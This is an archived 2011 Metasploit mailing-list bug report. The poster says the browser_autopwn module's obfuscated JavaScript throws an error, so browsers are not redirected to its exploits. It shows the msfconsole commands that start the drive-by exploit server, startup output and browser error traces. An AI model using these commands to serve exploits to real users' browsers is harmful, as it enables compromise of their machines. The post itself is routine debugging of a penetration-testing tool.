Metasploit mailing list archives

browser_autopwn broken in current version of Metasploit?


From: Arnar Gunnarsson <addi () addi org>
Date: Thu, 30 Jun 2011 00:41:52 +0000

There seems to be some issue with the JavaScript obfuscation feature
in the browser_autopwn module in Metasploit v3.8.0-dev (r13067).

I'm able to start the module, but when I browse to the URL of the
browser_autopwn server I'm not being redirected to the actual
exploits.

msf > use auxiliary/server/browser_autopwn
msf > set LHOST 192.168.43.140
msf > set URIPATH /
msf > run

[*] Starting exploit modules on host 192.168.43.140...
[*] ---

[.... snip]

[*] --- Done, found 21 exploit modules

[*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://192.168.43.140:8080/
[*] Server started.

Now I navigate to http://192.168.43.140:8080/ using any of the three
major browsers and they all result in the same JavaScript error (line
2069).
This happens before browser_autopwn identifies the OS and browser type
and redirects the browser to a specific exploit.

The offending line (line 2069)
NrkYCIMtz = nkenXYUAjhMoyZ.encode(NrkYCIMtz);


* Information from Firefox's Error Console:
---------------
Error: nkenXYUAjhMoyZ.encode is not a function
Source File: http://192.168.43.140:8080/

* Information from Chrome's Developer Tools:
---------------
Uncaught TypeError: Object #<Object> has no method 'encode'     :8080/:2069
oBeiS                   :8080/:2069
lNFkLUahB               :8080/:2075
(anonymous function)    :8080/:2076
onload                  :8080/:2077

* Information from IE8's Developer Tools
---------------
Object doesn't support this property or method
192.168.43.140:8080, line 2069 character 3


It is also worth mentioning that all the exploits have started
correctly and I can even point an IE7 instance to a specific IE exploit
URL that succeeds. But the redirect from URIPATH
(http://192.168.43.140:8080/) to the specific IE exploit URL does not
happen.


- Addi
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
